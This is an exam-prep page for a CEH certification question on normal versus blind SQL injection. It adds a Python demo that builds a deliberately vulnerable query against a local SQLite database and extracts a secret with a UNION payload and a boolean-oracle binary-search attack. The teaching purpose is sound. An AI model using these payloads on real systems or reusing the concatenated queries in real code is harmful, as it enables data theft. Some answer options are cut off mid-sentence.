EC-Council

312-50V9 Question #45: Real Exam Question with Answer & Explanation

The correct answer is D: The vulnerable application does not display errors with information about the injection results to. A "blind" injection is still a fully exploitable SQL injection; the only thing missing is direct feedback (query output or DBMS error text) in the HTTP response.

Question

What is the main difference between a "Normal" SQL Injection and a "Blind" SQL Injection vulnerability?

Options

  • A. The request to the web server is not visible to the administrator of the vulnerable application.
  • B. The attack is called "Blind" because, although the application properly filters user input, it is still
  • C. The successful attack does not show an error message to the administrator of the affected
  • D. The vulnerable application does not display errors with information about the injection results to

Explanation

The defining characteristic of blind SQL injection is that the application does not return query results or database error messages to the attacker. In a "normal" injection the response itself carries the evidence: a UNION payload appends rows from another table to the page, or a malformed payload makes the DBMS error text (which often names the table or column) appear in the output. In a blind injection the attacker has no such channel and must infer database contents indirectly, usually one yes/no answer per request: boolean-based (the page renders differently when an injected condition is true versus false), time-based (an injected delay such as a sleep or heavy query makes the response slow only when the condition holds), or out-of-band (the database is made to contact an attacker-controlled host). The vulnerability is the same unsafe query construction in both cases; blind injection is only slower to exploit, not safer, and tools such as sqlmap automate the inference.
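The contrast described above, as an added example that is not part of the exam page or of any vendor material. It simulates a vulnerable lookup against an in-memory SQLite database (the table, rows and secret values are constructed here) in two variants: a "normal" endpoint that echoes query output and DBMS errors, which a single UNION payload defeats, and a "blind" endpoint that only answers "user exists" or "user does not exist", against which the attacker recovers the same secret one character at a time with a boolean oracle and a binary search on the character code. The function and table names are illustrative assumptions.

```python
"""Normal vs blind SQL injection, simulated with the standard-library sqlite3 module.

Added example; not code from the exam page.  The vulnerable application, its
table contents and the attacker routines are all constructed below.
"""
import sqlite3

# Constructed sample data (assumption: one 'users' table with a 'secret' column).
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, username TEXT, secret TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'alice', 'S3cr3t!')")
_conn.execute("INSERT INTO users VALUES (2, 'bob', 'hunter2')")
_conn.commit()


def normal_lookup(username: str) -> str:
    """'Normal' SQLi: query results AND database errors are echoed to the client."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"  # unsafe concatenation
    try:
        rows = _conn.execute(sql).fetchall()
        return ", ".join(r[0] for r in rows)
    except sqlite3.Error as exc:
        return f"DB error: {exc}"  # error text leaks straight back to the attacker


def blind_lookup(username: str) -> bool:
    """'Blind' SQLi: the same unsafe concatenation, but the response is only
    True ('user exists') or False ('no such user'); errors are swallowed."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"  # unsafe concatenation
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def union_extract(target_id: int = 1) -> str:
    """Against the normal endpoint one UNION payload returns the secret directly."""
    return normal_lookup(f"x' UNION SELECT secret FROM users WHERE id={target_id} --")


def _oracle(condition: str) -> bool:
    """Ask the blind endpoint a yes/no question about the database.

    'alice' exists, so the row comes back exactly when the injected
    condition is true; the trailing '--' comments out the closing quote."""
    return blind_lookup(f"alice' AND ({condition}) --")


def _binary_search(max_value: int, predicate_sql: str) -> int:
    """Largest v in [0, max_value] for which '<predicate_sql> >= v' holds."""
    lo, hi = 0, max_value
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if _oracle(f"{predicate_sql} >= {mid}"):
            lo = mid
        else:
            hi = mid - 1
    return lo


def blind_extract(target_id: int, max_len: int = 64) -> str:
    """Recover a secret through the blind endpoint using only true/false answers.

    Step 1 learns the length, step 2 learns each character's code point;
    every request yields one bit, so the cost is roughly 7 requests per byte."""
    secret_sql = f"(SELECT secret FROM users WHERE id={target_id})"
    length = _binary_search(max_len, f"length({secret_sql})")
    recovered = ""
    for pos in range(1, length + 1):  # SQLite substr() is 1-indexed
        code = _binary_search(127, f"unicode(substr({secret_sql}, {pos}, 1))")
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    print("normal endpoint, UNION payload :", union_extract(1))
    print("normal endpoint, bad quote     :", normal_lookup("'"))
    print("blind endpoint, bad quote      :", blind_lookup("'"))
    print("blind endpoint, inferred secret:", blind_extract(1))
```

Note what changes between the two endpoints: the SQL is built identically, so the flaw is identical; only the feedback differs. `normal_lookup("'")` hands the attacker the parser's error message, while `blind_lookup("'")` just says `False`, and the attacker compensates by asking many small questions instead of one large one.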

Common mistakes.

  • A. The visibility of requests to the server administrator is irrelevant to the classification of SQL injection as normal or blind; the distinction is about what information is returned to the attacker in the response.
  • B. Blind SQL injection does not imply that the application properly filters input; the application is still vulnerable, but it simply does not echo results or errors back in the response.
  • C. Whether error messages are shown to the administrator is not the defining criterion; the key factor is whether injection-related output is displayed to the attacker making the request.

Concept tested. Difference between normal and blind SQL injection

Reference. https://owasp.org/www-community/attacks/Blind_SQL_Injection

